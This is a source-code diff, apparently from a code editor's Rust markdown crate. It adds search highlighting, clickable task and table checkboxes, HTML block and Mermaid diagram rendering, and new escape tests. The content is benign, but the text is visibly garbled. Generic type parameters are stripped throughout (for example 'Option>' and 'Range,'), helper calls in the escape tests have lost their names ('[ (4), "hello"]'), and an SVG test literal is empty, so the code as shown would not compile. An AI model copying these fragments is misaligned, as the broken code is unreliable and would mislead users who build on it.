+ builder.push_div(div().flex_1().w_0(), range, markdown_end); + } + + fn pop_markdown_list_item(&self, builder: &mut MarkdownElementBuilder) { + builder.pop_div(); + builder.pop_div(); + } + + fn paint_highlight_range( bounds: Bounds, + start: usize, + end: usize, + color: Hsla, rendered_text: &RenderedText, window: &mut Window, - cx: &mut App, ) { - let selection = self.markdown.read(cx).selection.clone(); - let selection_start = rendered_text.position_for_source_index(selection.start); - let selection_end = rendered_text.position_for_source_index(selection.end); + let start_pos = rendered_text.position_for_source_index(start); + let end_pos = rendered_text.position_for_source_index(end); if let Some(((start_position, start_line_height), (end_position, end_line_height))) = - selection_start.zip(selection_end) + start_pos.zip(end_pos) { if start_position.y == end_position.y { window.paint_quad(quad( @@ -745,7 +1144,7 @@ impl MarkdownElement { point(end_position.x, end_position.y + end_line_height), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -757,7 +1156,7 @@ impl MarkdownElement { point(bounds.right(), start_position.y + start_line_height), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -770,7 +1169,7 @@ impl MarkdownElement { point(bounds.right(), end_position.y), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -783,7 +1182,7 @@ impl MarkdownElement { point(end_position.x, end_position.y + end_line_height), ), Pixels::ZERO, - self.style.selection_background_color, + color, Edges::default(), Hsla::transparent_black(), BorderStyle::default(), @@ -792,6 +1191,52 @@ impl MarkdownElement { } } + fn paint_selection( + &self, + bounds: Bounds, + rendered_text: &RenderedText, + window: &mut 
Window, + cx: &mut App, + ) { + let selection = self.markdown.read(cx).selection.clone(); + Self::paint_highlight_range( + bounds, + selection.start, + selection.end, + self.style.selection_background_color, + rendered_text, + window, + ); + } + + fn paint_search_highlights( + &self, + bounds: Bounds, + rendered_text: &RenderedText, + window: &mut Window, + cx: &mut App, + ) { + let markdown = self.markdown.read(cx); + let active_index = markdown.active_search_highlight; + let colors = cx.theme().colors(); + + for (i, highlight_range) in markdown.search_highlights.iter().enumerate() { + let color = if Some(i) == active_index { + colors.search_active_match_background + } else { + colors.search_match_background + }; + Self::paint_highlight_range( + bounds, + highlight_range.start, + highlight_range.end, + color, + rendered_text, + window, + ); + } + } + fn paint_mouse_listeners( &mut self, hitbox: &Hitbox, @@ -818,6 +1263,7 @@ impl MarkdownElement { } let on_open_url = self.on_url_click.take(); + let on_source_click = self.on_source_click.take(); self.on_mouse_event(window, cx, { let hitbox = hitbox.clone(); @@ -845,6 +1291,16 @@ impl MarkdownElement { match rendered_text.source_index_for_position(event.position) { Ok(ix) | Err(ix) => ix, }; + if let Some(handler) = on_source_click.as_ref() { + let blocked = handler(source_index, event.click_count, window, cx); + if blocked { + markdown.selection = Selection::default(); + markdown.pressed_link = None; + window.prevent_default(); + cx.notify(); + return; + } + } let (range, mode) = match event.click_count { 1 => { let range = source_index..source_index; @@ -902,6 +1358,7 @@ impl MarkdownElement { Ok(ix) | Err(ix) => ix, }; markdown.selection.set_head(source_index, &rendered_text); + markdown.autoscroll_code_block(source_index, event.position); markdown.autoscroll_request = Some(source_index); cx.notify(); } else { @@ -951,14 +1408,38 @@ impl MarkdownElement { .update(cx, |markdown, _| 
markdown.autoscroll_request.take())?; let (position, line_height) = rendered_text.position_for_source_index(autoscroll_index)?; - let text_style = self.style.base_text_style.clone(); - let font_id = window.text_system().resolve_font(&text_style.font()); - let font_size = text_style.font_size.to_pixels(window.rem_size()); - let em_width = window.text_system().em_width(font_id, font_size).unwrap(); - window.request_autoscroll(Bounds::from_corners( - point(position.x - 3. * em_width, position.y - 3. * line_height), - point(position.x + 3. * em_width, position.y + 3. * line_height), - )); + match &self.autoscroll { + AutoscrollBehavior::Controlled(scroll_handle) => { + let viewport = scroll_handle.bounds(); + let margin = line_height * 3.; + let top_goal = viewport.top() + margin; + let bottom_goal = viewport.bottom() - margin; + let current_offset = scroll_handle.offset(); + + let new_offset_y = if position.y < top_goal { + current_offset.y + (top_goal - position.y) + } else if position.y + line_height > bottom_goal { + current_offset.y + (bottom_goal - (position.y + line_height)) + } else { + current_offset.y + }; + + scroll_handle.set_offset(point( + current_offset.x, + new_offset_y.clamp(-scroll_handle.max_offset().y, Pixels::ZERO), + )); + } + AutoscrollBehavior::Propagate => { + let text_style = self.style.base_text_style.clone(); + let font_id = window.text_system().resolve_font(&text_style.font()); + let font_size = text_style.font_size.to_pixels(window.rem_size()); + let em_width = window.text_system().em_width(font_id, font_size).unwrap(); + window.request_autoscroll(Bounds::from_corners( + point(position.x - 3. * em_width, position.y - 3. * line_height), + point(position.x + 3. * em_width, position.y + 3. 
* line_height), + )); + } + } Some(()) } @@ -1010,11 +1491,14 @@ impl Element for MarkdownElement { self.style.base_text_style.clone(), self.style.syntax.clone(), ); - let (parsed_markdown, images) = { + let (parsed_markdown, images, active_root_block, render_mermaid_diagrams, mermaid_state) = { let markdown = self.markdown.read(cx); ( markdown.parsed_markdown.clone(), markdown.images_by_source_offset.clone(), + markdown.active_root_block, + markdown.options.render_mermaid_diagrams, + markdown.mermaid_state.clone(), ) }; let markdown_end = if let Some(last) = parsed_markdown.events.last() { @@ -1025,6 +1509,8 @@ impl Element for MarkdownElement { let mut code_block_ids = HashSet::default(); let mut current_img_block_range: Option> = None; + let mut handled_html_block = false; + let mut rendered_mermaid_block = false; for (index, (range, event)) in parsed_markdown.events.iter().enumerate() { // Skip alt text for images that rendered if let Some(current_img_block_range) = ¤t_img_block_range @@ -1033,58 +1519,83 @@ impl Element for MarkdownElement { continue; } + if handled_html_block { + if let MarkdownEvent::End(MarkdownTagEnd::HtmlBlock) = event { + handled_html_block = false; + } else { + continue; + } + } + + if rendered_mermaid_block { + if matches!(event, MarkdownEvent::End(MarkdownTagEnd::CodeBlock)) { + rendered_mermaid_block = false; + } + continue; + } + match event { + MarkdownEvent::RootStart => { + if self.show_root_block_markers { + builder.push_root_block(range, markdown_end); + } + } + MarkdownEvent::RootEnd(root_block_index) => { + if self.show_root_block_markers { + builder.pop_root_block( + active_root_block == Some(*root_block_index), + cx.theme().colors().border, + cx.theme().colors().border_variant, + ); + } + } MarkdownEvent::Start(tag) => { match tag { - MarkdownTag::Image { .. } => { + MarkdownTag::Image { dest_url, .. 
} => { if let Some(image) = images.get(&range.start) { current_img_block_range = Some(range.clone()); - builder.modify_current_div(|el| { - el.items_center() - .flex() - .flex_row() - .child(img(image.clone())) - }); + self.push_markdown_image( + &mut builder, + range, + image.clone().into(), + None, + None, + ); + } else if let Some(source) = self + .image_resolver + .as_ref() + .and_then(|resolve| resolve(dest_url.as_ref())) + { + current_img_block_range = Some(range.clone()); + self.push_markdown_image(&mut builder, range, source, None, None); } } MarkdownTag::Paragraph => { - builder.push_div( - div().when(!self.style.height_is_multiple_of_line_height, |el| { - el.mb_2().line_height(rems(1.3)) - }), - range, - markdown_end, - ); + self.push_markdown_paragraph(&mut builder, range, markdown_end); } MarkdownTag::Heading { level, .. } => { - let mut heading = div().mb_2(); - - heading = apply_heading_style( - heading, - *level, - self.style.heading_level_styles.as_ref(), - ); - - heading.style().refine(&self.style.heading); - - let text_style = self.style.heading.text_style().clone(); - - builder.push_text_style(text_style); - builder.push_div(heading, range, markdown_end); + self.push_markdown_heading(&mut builder, *level, range, markdown_end); } MarkdownTag::BlockQuote => { - builder.push_text_style(self.style.block_quote.clone()); - builder.push_div( - div() - .pl_4() - .mb_2() - .border_l_4() - .border_color(self.style.block_quote_border_color), - range, - markdown_end, - ); + self.push_markdown_block_quote(&mut builder, range, markdown_end); } MarkdownTag::CodeBlock { kind, .. 
} => { + if render_mermaid_diagrams + && let Some(mermaid_diagram) = + parsed_markdown.mermaid_diagrams.get(&range.start) + { + builder.push_sourced_element( + mermaid_diagram.content_range.clone(), + render_mermaid_diagram( + mermaid_diagram, + &mermaid_state, + &self.style, + ), + ); + rendered_mermaid_block = true; + continue; + } + let language = match kind { CodeBlockKind::Fenced => None, CodeBlockKind::FencedLang(language) => { @@ -1168,46 +1679,57 @@ impl Element for MarkdownElement { (CodeBlockRenderer::Custom { .. }, _) => {} } } - MarkdownTag::HtmlBlock => builder.push_div(div(), range, markdown_end), + MarkdownTag::HtmlBlock => { + builder.push_div(div(), range, markdown_end); + if let Some(block) = parsed_markdown.html_blocks.get(&range.start) { + self.render_html_block(block, &mut builder, markdown_end, cx); + handled_html_block = true; + } + } MarkdownTag::List(bullet_index) => { builder.push_list(*bullet_index); builder.push_div(div().pl_2p5(), range, markdown_end); } MarkdownTag::Item => { - let bullet = if let Some((_, MarkdownEvent::TaskListMarker(checked))) = - parsed_markdown.events.get(index.saturating_add(1)) - { - let source = &parsed_markdown.source()[range.clone()]; - - Checkbox::new( - ElementId::Name(source.to_string().into()), - if *checked { + let bullet = + if let Some((task_range, MarkdownEvent::TaskListMarker(checked))) = + parsed_markdown.events.get(index.saturating_add(1)) + { + let source = &parsed_markdown.source()[range.clone()]; + let checked = *checked; + let toggle_state = if checked { ToggleState::Selected } else { ToggleState::Unselected - }, - ) - .fill() - .visualization_only(true) - .into_any_element() - } else if let Some(bullet_index) = builder.next_bullet_index() { - div().child(format!("{}.", bullet_index)).into_any_element() - } else { - div().child("•").into_any_element() - }; - builder.push_div( - div() - .when(!self.style.height_is_multiple_of_line_height, |el| { - el.mb_1().gap_1().line_height(rems(1.3)) - }) - 
.h_flex() - .items_start() - .child(bullet), - range, - markdown_end, - ); - // Without `w_0`, text doesn't wrap to the width of the container. - builder.push_div(div().flex_1().w_0(), range, markdown_end); + }; + + let checkbox = Checkbox::new( + ElementId::Name(source.to_string().into()), + toggle_state, + ) + .fill(); + + if let Some(on_toggle) = self.on_checkbox_toggle.clone() { + let task_source_range = task_range.clone(); + checkbox + .on_click(move |_state, window, cx| { + on_toggle( + task_source_range.clone(), + !checked, + window, + cx, + ); + }) + .into_any_element() + } else { + checkbox.visualization_only(true).into_any_element() + } + } else if let Some(bullet_index) = builder.next_bullet_index() { + div().child(format!("{}.", bullet_index)).into_any_element() + } else { + div().child("•").into_any_element() + }; + self.push_markdown_list_item(&mut builder, bullet, range, markdown_end); } MarkdownTag::Emphasis => builder.push_text_style(TextStyleRefinement { font_style: Some(FontStyle::Italic), @@ -1307,12 +1829,10 @@ impl Element for MarkdownElement { builder.pop_div(); } MarkdownTagEnd::Heading(_) => { - builder.pop_div(); - builder.pop_text_style() + self.pop_markdown_heading(&mut builder); } MarkdownTagEnd::BlockQuote(_kind) => { - builder.pop_text_style(); - builder.pop_div() + self.pop_markdown_block_quote(&mut builder); } MarkdownTagEnd::CodeBlock => { builder.trim_trailing_newline(); @@ -1322,38 +1842,10 @@ impl Element for MarkdownElement { builder.pop_text_style(); if let CodeBlockRenderer::Default { - copy_button: true, .. 
- } = &self.code_block_renderer - { - builder.modify_current_div(|el| { - let content_range = parser::extract_code_block_content_range( - &parsed_markdown.source()[range.clone()], - ); - let content_range = content_range.start + range.start - ..content_range.end + range.start; - - let code = parsed_markdown.source()[content_range].to_string(); - let codeblock = render_copy_code_block_button( - range.end, - code, - self.markdown.clone(), - ); - el.child( - h_flex() - .w_4() - .absolute() - .top_1p5() - .right_1p5() - .justify_end() - .child(codeblock), - ) - }); - } - - if let CodeBlockRenderer::Default { - copy_button_on_hover: true, + copy_button_visibility, .. } = &self.code_block_renderer + && *copy_button_visibility != CopyButtonVisibility::Hidden { builder.modify_current_div(|el| { let content_range = parser::extract_code_block_content_range( @@ -1372,10 +1864,17 @@ impl Element for MarkdownElement { h_flex() .w_4() .absolute() - .top_0() - .right_0() .justify_end() - .visible_on_hover("code_block") + .when_else( + *copy_button_visibility + == CopyButtonVisibility::VisibleOnHover, + |this| { + this.top_0() + .right_0() + .visible_on_hover("code_block") + }, + |this| this.top_1p5().right_1p5(), + ) .child(codeblock), ) }); @@ -1390,8 +1889,7 @@ impl Element for MarkdownElement { builder.pop_div(); } MarkdownTagEnd::Item => { - builder.pop_div(); - builder.pop_div(); + self.pop_markdown_list_item(&mut builder); } MarkdownTagEnd::Emphasis => builder.pop_text_style(), MarkdownTagEnd::Strong => builder.pop_text_style(), @@ -1413,6 +1911,7 @@ impl Element for MarkdownElement { builder.table.end_row(); } MarkdownTagEnd::TableCell => { + builder.replace_pending_checkbox(range); builder.pop_div(); builder.table.end_cell(); } @@ -1542,6 +2041,7 @@ impl Element for MarkdownElement { self.paint_mouse_listeners(hitbox, &rendered_markdown.text, window, cx); rendered_markdown.element.paint(window, cx); + self.paint_search_highlights(bounds, &rendered_markdown.text, window, 
cx); self.paint_selection(bounds, &rendered_markdown.text, window, cx); } } @@ -1807,6 +2307,15 @@ impl MarkdownElementBuilder { self.div_stack.push(div); } + fn push_root_block(&mut self, range: &Range, markdown_end: usize) { + self.push_div( + div().group("markdown-root-block").relative(), + range, + markdown_end, + ); + self.push_div(div().pl_4(), range, markdown_end); + } + fn modify_current_div(&mut self, f: impl FnOnce(AnyDiv) -> AnyDiv) { self.flush_text(); if let Some(div) = self.div_stack.pop() { @@ -1814,12 +2323,53 @@ impl MarkdownElementBuilder { } } + fn pop_root_block( + &mut self, + is_active: bool, + active_gutter_color: Hsla, + hovered_gutter_color: Hsla, + ) { + self.pop_div(); + self.modify_current_div(|el| { + el.child( + div() + .h_full() + .w(px(4.0)) + .when(is_active, |this| this.bg(active_gutter_color)) + .group_hover("markdown-root-block", |this| { + if is_active { + this + } else { + this.bg(hovered_gutter_color) + } + }) + .rounded_xs() + .absolute() + .left_0() + .top_0(), + ) + }); + self.pop_div(); + } + fn pop_div(&mut self) { self.flush_text(); let div = self.div_stack.pop().unwrap().into_any_element(); self.div_stack.last_mut().unwrap().extend(iter::once(div)); } + fn push_sourced_element(&mut self, source_range: Range, element: impl Into) { + self.flush_text(); + let anchor = self.render_source_anchor(source_range); + self.div_stack.last_mut().unwrap().extend([{ + div() + .relative() + .child(anchor) + .child(element.into()) + .into_any_element() + }]); + } + fn push_list(&mut self, bullet_index: Option) { self.list_stack.push(ListStackEntry { bullet_index }); } @@ -1869,9 +2419,10 @@ impl MarkdownElementBuilder { } let mut run_style = self.text_style(); - if let Some(highlight) = highlight_id.style(&self.syntax_theme) { + if let Some(highlight) = self.syntax_theme.get(highlight_id).cloned() { run_style = run_style.highlight(highlight); } + self.pending_line.runs.push(run_style.to_run(range.len())); offset = range.end; } @@ 
-1898,6 +2449,51 @@ impl MarkdownElementBuilder { } } + fn replace_pending_checkbox(&mut self, source_range: &Range) { + let trimmed = self.pending_line.text.trim(); + if trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" { + let checked = trimmed != "[ ]"; + self.pending_line = PendingLine::default(); + let checkbox = Checkbox::new( + ElementId::Name( + format!("table_checkbox_{}_{}", source_range.start, source_range.end).into(), + ), + if checked { + ToggleState::Selected + } else { + ToggleState::Unselected + }, + ) + .fill() + .visualization_only(true) + .into_any_element(); + self.div_stack.last_mut().unwrap().extend([checkbox]); + } + } + + fn render_source_anchor(&mut self, source_range: Range) -> AnyElement { + let mut text_style = self.base_text_style.clone(); + text_style.color = Hsla::transparent_black(); + let text = "\u{200B}"; + let styled_text = StyledText::new(text).with_runs(vec![text_style.to_run(text.len())]); + self.rendered_lines.push(RenderedLine { + layout: styled_text.layout().clone(), + source_mappings: vec![SourceMapping { + rendered_index: 0, + source_index: source_range.start, + }], + source_end: source_range.end, + language: None, + }); + div() + .absolute() + .top_0() + .left_0() + .opacity(0.) 
+ .child(styled_text) + .into_any_element() + } + fn flush_text(&mut self) { let line = mem::take(&mut self.pending_line); if line.text.is_empty() { @@ -1947,7 +2543,7 @@ impl RenderedLine { Ok(ix) => &self.source_mappings[ix], Err(ix) => &self.source_mappings[ix - 1], }; - mapping.rendered_index + (source_index - mapping.source_index) + (mapping.rendered_index + (source_index - mapping.source_index)).min(self.layout.len()) } fn source_index_for_rendered_index(&self, rendered_index: usize) -> usize { @@ -2211,7 +2807,7 @@ mod tests { settings::init(cx); } if !cx.has_global::() { - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); } }); } @@ -2275,6 +2871,15 @@ mod tests { markdown: &str, language_registry: Option>, cx: &mut TestAppContext, + ) -> RenderedText { + render_markdown_with_options(markdown, language_registry, MarkdownOptions::default(), cx) + } + + fn render_markdown_with_options( + markdown: &str, + language_registry: Option>, + options: MarkdownOptions, + cx: &mut TestAppContext, ) -> RenderedText { struct TestWindow; @@ -2287,8 +2892,15 @@ mod tests { ensure_theme_initialized(cx); let (_, cx) = cx.add_window_view(|_, _| TestWindow); - let markdown = - cx.new(|cx| Markdown::new(markdown.to_string().into(), language_registry, None, cx)); + let markdown = cx.new(|cx| { + Markdown::new_with_options( + markdown.to_string().into(), + language_registry, + None, + options, + cx, + ) + }); cx.run_until_parked(); let (rendered, _) = cx.draw( Default::default(), @@ -2296,8 +2908,7 @@ mod tests { |_window, _cx| { MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( CodeBlockRenderer::Default { - copy_button: false, - copy_button_on_hover: false, + copy_button_visibility: CopyButtonVisibility::Hidden, border: false, }, ) @@ -2465,6 +3076,48 @@ mod tests { assert_eq!(second_word, "b"); } + #[test] + fn test_table_checkbox_detection() { + let md = "| Done |\n|------|\n| [x] |\n| [ ] |"; + 
let events = crate::parser::parse_markdown_with_options(md, false).events; + + let mut in_table = false; + let mut cell_texts: Vec = Vec::new(); + let mut current_cell = String::new(); + + for (range, event) in &events { + match event { + MarkdownEvent::Start(MarkdownTag::Table(_)) => in_table = true, + MarkdownEvent::End(MarkdownTagEnd::Table) => in_table = false, + MarkdownEvent::Start(MarkdownTag::TableCell) => current_cell.clear(), + MarkdownEvent::End(MarkdownTagEnd::TableCell) => { + if in_table { + cell_texts.push(current_cell.clone()); + } + } + MarkdownEvent::Text if in_table => { + current_cell.push_str(&md[range.clone()]); + } + _ => {} + } + } + + let checkbox_cells: Vec<&String> = cell_texts + .iter() + .filter(|t| { + let trimmed = t.trim(); + trimmed == "[x]" || trimmed == "[X]" || trimmed == "[ ]" + }) + .collect(); + assert_eq!( + checkbox_cells.len(), + 2, + "Expected 2 checkbox cells, got: {cell_texts:?}" + ); + assert_eq!(checkbox_cells[0].trim(), "[x]"); + assert_eq!(checkbox_cells[1].trim(), "[ ]"); + } + #[gpui::test] fn test_inline_code_word_selection_excludes_backticks(cx: &mut TestAppContext) { // Test that double-clicking on inline code selects just the code content, @@ -2576,13 +3229,118 @@ mod tests { ); } + fn nbsp(n: usize) -> String { + "\u{00A0}".repeat(n) + } + + #[test] + fn test_escape_plain_text() { + assert_eq!(Markdown::escape("hello world"), "hello world"); + assert_eq!(Markdown::escape(""), ""); + assert_eq!(Markdown::escape("café ☕ naïve"), "café ☕ naïve"); + } + + #[test] + fn test_escape_punctuation() { + assert_eq!(Markdown::escape("hello `world`"), r"hello \`world\`"); + assert_eq!(Markdown::escape("a|b"), r"a\|b"); + } + #[test] - fn test_escape() { - assert_eq!(Markdown::escape("hello `world`"), "hello \\`world\\`"); + fn test_escape_leading_spaces() { + assert_eq!(Markdown::escape(" hello"), [ (4), "hello"].concat()); + assert_eq!( + Markdown::escape(" | { a: string }"), + [ (4), r"\| \{ a\: string \}"].concat() + ); 
assert_eq!( - Markdown::escape("hello\n cool world"), - "hello\n\ncool world" + Markdown::escape(" first\n second"), + [ (2), "first\n\n",  (2), "second"].concat() ); + assert_eq!(Markdown::escape("hello world"), "hello world"); + } + + #[test] + fn test_escape_leading_tabs() { + assert_eq!(Markdown::escape("\thello"), [ (4), "hello"].concat()); + assert_eq!( + Markdown::escape("hello\n\t\tindented"), + ["hello\n\n",  (8), "indented"].concat() + ); + assert_eq!( + Markdown::escape(" \t hello"), + [ (1 + 4 + 1), "hello"].concat() + ); + assert_eq!(Markdown::escape("hello\tworld"), "hello\tworld"); + } + + #[test] + fn test_escape_newlines() { + assert_eq!(Markdown::escape("a\nb"), "a\n\nb"); + assert_eq!(Markdown::escape("a\n\nb"), "a\n\n\n\nb"); + assert_eq!(Markdown::escape("\nhello"), "\n\nhello"); + } + + #[test] + fn test_escape_multiline_diagnostic() { + assert_eq!( + Markdown::escape(" | { a: string }\n | { b: number }"), + [ +  (4), + r"\| \{ a\: string \}", + "\n\n", +  (4), + r"\| \{ b\: number \}", + ] + .concat() + ); + } + + fn has_code_block(markdown: &str) -> bool { + let parsed_data = parse_markdown_with_options(markdown, false); + parsed_data + .events + .iter() + .any(|(_, event)| matches!(event, MarkdownEvent::Start(MarkdownTag::CodeBlock { .. 
}))) + } + + #[test] + fn test_escape_output_len_matches_precomputed() { + let cases = [ + "", + "hello world", + "hello `world`", + " hello", + " | { a: string }", + "\thello", + "hello\n\t\tindented", + " \t hello", + "hello\tworld", + "a\nb", + "a\n\nb", + "\nhello", + " | { a: string }\n | { b: number }", + "café ☕ naïve", + ]; + for input in cases { + let mut escaper = MarkdownEscaper::new(); + let precomputed: usize = input.bytes().map(|b| escaper.next(b).output_len()).sum(); + + let mut escaper = MarkdownEscaper::new(); + let mut output = String::new(); + for c in input.chars() { + escaper.next(c as u8).write_to(c, &mut output); + } + + assert_eq!(precomputed, output.len(), "length mismatch for {:?}", input); + } + } + + #[test] + fn test_escape_prevents_code_block() { + let diagnostic = " | { a: string }"; + assert!(has_code_block(diagnostic)); + assert!(!has_code_block(&Markdown::escape(diagnostic))); } #[track_caller] diff --git a/crates/markdown/src/mermaid.rs b/crates/markdown/src/mermaid.rs new file mode 100644 index 0000000000000000000000000000000000000000..b8e40ebe7ec16cbbb8d9b11ab3edfc75da46f3a9 --- /dev/null +++ b/crates/markdown/src/mermaid.rs @@ -0,0 +1,614 @@ +use collections::HashMap; +use gpui::{ + Animation, AnimationExt, AnyElement, Context, ImageSource, RenderImage, StyledText, Task, img, + pulsating_between, +}; +use std::collections::BTreeMap; +use std::ops::Range; +use std::sync::{Arc, OnceLock}; +use std::time::Duration; +use ui::prelude::*; + +use crate::parser::{CodeBlockKind, MarkdownEvent, MarkdownTag}; + +use super::{Markdown, MarkdownStyle, ParsedMarkdown}; + +type MermaidDiagramCache = HashMap>; + +#[derive(Clone, Debug)] +pub(crate) struct ParsedMarkdownMermaidDiagram { + pub(crate) content_range: Range, + pub(crate) contents: ParsedMarkdownMermaidDiagramContents, +} + +#[derive(Clone, Debug, PartialEq, Eq, Hash)] +pub(crate) struct ParsedMarkdownMermaidDiagramContents { + pub(crate) contents: SharedString, + pub(crate) scale: 
u32, +} + +#[derive(Default, Clone)] +pub(crate) struct MermaidState { + cache: MermaidDiagramCache, + order: Vec, +} + +struct CachedMermaidDiagram { + render_image: Arc>>>, + fallback_image: Option>, + _task: Task<()>, +} + +impl MermaidState { + pub(crate) fn clear(&mut self) { + self.cache.clear(); + self.order.clear(); + } + + fn get_fallback_image( + idx: usize, + old_order: &[ParsedMarkdownMermaidDiagramContents], + new_order_len: usize, + cache: &MermaidDiagramCache, + ) -> Option> { + if old_order.len() != new_order_len { + return None; + } + + old_order.get(idx).and_then(|old_content| { + cache.get(old_content).and_then(|old_cached| { + old_cached + .render_image + .get() + .and_then(|result| result.as_ref().ok().cloned()) + .or_else(|| old_cached.fallback_image.clone()) + }) + }) + } + + pub(crate) fn update(&mut self, parsed: &ParsedMarkdown, cx: &mut Context) { + let mut new_order = Vec::new(); + for mermaid_diagram in parsed.mermaid_diagrams.values() { + new_order.push(mermaid_diagram.contents.clone()); + } + + for (idx, new_content) in new_order.iter().enumerate() { + if !self.cache.contains_key(new_content) { + let fallback = + Self::get_fallback_image(idx, &self.order, new_order.len(), &self.cache); + self.cache.insert( + new_content.clone(), + Arc::new(CachedMermaidDiagram::new(new_content.clone(), fallback, cx)), + ); + } + } + + let new_order_set: std::collections::HashSet<_> = new_order.iter().cloned().collect(); + self.cache + .retain(|content, _| new_order_set.contains(content)); + self.order = new_order; + } +} + +impl CachedMermaidDiagram { + fn new( + contents: ParsedMarkdownMermaidDiagramContents, + fallback_image: Option>, + cx: &mut Context, + ) -> Self { + let render_image = Arc::new(OnceLock::>>::new()); + let render_image_clone = render_image.clone(); + let svg_renderer = cx.svg_renderer(); + + let task = cx.spawn(async move |this, cx| { + let value = cx + .background_spawn(async move { + let svg_string = 
mermaid_rs_renderer::render(&contents.contents)?; + let scale = contents.scale as f32 / 100.0; + svg_renderer + .render_single_frame(svg_string.as_bytes(), scale) + .map_err(|error| anyhow::anyhow!("{error}")) + }) + .await; + let _ = render_image_clone.set(value); + this.update(cx, |_, cx| { + cx.notify(); + }) + .ok(); + }); + + Self { + render_image, + fallback_image, + _task: task, + } + } + + #[cfg(test)] + fn new_for_test( + render_image: Option>, + fallback_image: Option>, + ) -> Self { + let result = Arc::new(OnceLock::new()); + if let Some(render_image) = render_image { + let _ = result.set(Ok(render_image)); + } + Self { + render_image: result, + fallback_image, + _task: Task::ready(()), + } + } +} + +fn parse_mermaid_info(info: &str) -> Option { + let mut parts = info.split_whitespace(); + if parts.next()? != "mermaid" { + return None; + } + + Some( + parts + .next() + .and_then(|scale| scale.parse().ok()) + .unwrap_or(100) + .clamp(10, 500), + ) +} + +pub(crate) fn extract_mermaid_diagrams( + source: &str, + events: &[(Range, MarkdownEvent)], +) -> BTreeMap { + let mut mermaid_diagrams = BTreeMap::default(); + + for (source_range, event) in events { + let MarkdownEvent::Start(MarkdownTag::CodeBlock { kind, metadata }) = event else { + continue; + }; + let CodeBlockKind::FencedLang(info) = kind else { + continue; + }; + let Some(scale) = parse_mermaid_info(info.as_ref()) else { + continue; + }; + + let contents = source[metadata.content_range.clone()] + .strip_suffix('\n') + .unwrap_or(&source[metadata.content_range.clone()]) + .to_string(); + mermaid_diagrams.insert( + source_range.start, + ParsedMarkdownMermaidDiagram { + content_range: metadata.content_range.clone(), + contents: ParsedMarkdownMermaidDiagramContents { + contents: contents.into(), + scale, + }, + }, + ); + } + + mermaid_diagrams +} + +pub(crate) fn render_mermaid_diagram( + parsed: &ParsedMarkdownMermaidDiagram, + mermaid_state: &MermaidState, + style: &MarkdownStyle, +) -> AnyElement { 
+ let cached = mermaid_state.cache.get(&parsed.contents); + let mut container = div().w_full(); + container.style().refine(&style.code_block); + + if let Some(result) = cached.and_then(|cached| cached.render_image.get()) { + match result { + Ok(render_image) => container + .child( + div().w_full().child( + img(ImageSource::Render(render_image.clone())) + .max_w_full() + .with_fallback(|| { + div() + .child(Label::new("Failed to load mermaid diagram")) + .into_any_element() + }), + ), + ) + .into_any_element(), + Err(_) => container + .child(StyledText::new(parsed.contents.contents.clone())) + .into_any_element(), + } + } else if let Some(fallback) = cached.and_then(|cached| cached.fallback_image.as_ref()) { + container + .child( + div() + .w_full() + .child( + img(ImageSource::Render(fallback.clone())) + .max_w_full() + .with_fallback(|| { + div() + .child(Label::new("Failed to load mermaid diagram")) + .into_any_element() + }), + ) + .with_animation( + "mermaid-fallback-pulse", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.6, 1.0)), + |element, delta| element.opacity(delta), + ), + ) + .into_any_element() + } else { + container + .child( + Label::new("Rendering mermaid diagram...") + .color(Color::Muted) + .with_animation( + "mermaid-loading-pulse", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |label, delta| label.alpha(delta), + ), + ) + .into_any_element() + } +} + +#[cfg(test)] +mod tests { + use super::{ + CachedMermaidDiagram, MermaidDiagramCache, MermaidState, + ParsedMarkdownMermaidDiagramContents, extract_mermaid_diagrams, parse_mermaid_info, + }; + use crate::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownOptions, + MarkdownStyle, + }; + use collections::HashMap; + use gpui::{Context, IntoElement, Render, RenderImage, TestAppContext, Window, size}; + use std::sync::Arc; + use ui::prelude::*; + + fn ensure_theme_initialized(cx: 
&mut TestAppContext) { + cx.update(|cx| { + if !cx.has_global::() { + settings::init(cx); + } + if !cx.has_global::() { + theme_settings::init(theme::LoadThemes::JustBase, cx); + } + }); + } + + fn render_markdown_with_options( + markdown: &str, + options: MarkdownOptions, + cx: &mut TestAppContext, + ) -> crate::RenderedText { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| { + Markdown::new_with_options(markdown.to_string().into(), None, None, options, cx) + }); + cx.run_until_parked(); + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( + CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }, + ) + }, + ); + rendered.text + } + + fn mock_render_image(cx: &mut TestAppContext) -> Arc { + cx.update(|cx| { + cx.svg_renderer() + .render_single_frame( + br#""#, + 1.0, + ) + .unwrap() + }) + } + + fn mermaid_contents(contents: &str) -> ParsedMarkdownMermaidDiagramContents { + ParsedMarkdownMermaidDiagramContents { + contents: contents.to_string().into(), + scale: 100, + } + } + + fn mermaid_sequence(diagrams: &[&str]) -> Vec { + diagrams + .iter() + .map(|diagram| mermaid_contents(diagram)) + .collect() + } + + fn mermaid_fallback( + new_diagram: &str, + new_full_order: &[ParsedMarkdownMermaidDiagramContents], + old_full_order: &[ParsedMarkdownMermaidDiagramContents], + cache: &MermaidDiagramCache, + ) -> Option> { + let new_content = mermaid_contents(new_diagram); + let idx = new_full_order + .iter() + .position(|diagram| diagram == &new_content)?; + MermaidState::get_fallback_image(idx, old_full_order, new_full_order.len(), cache) + } + + #[test] + fn 
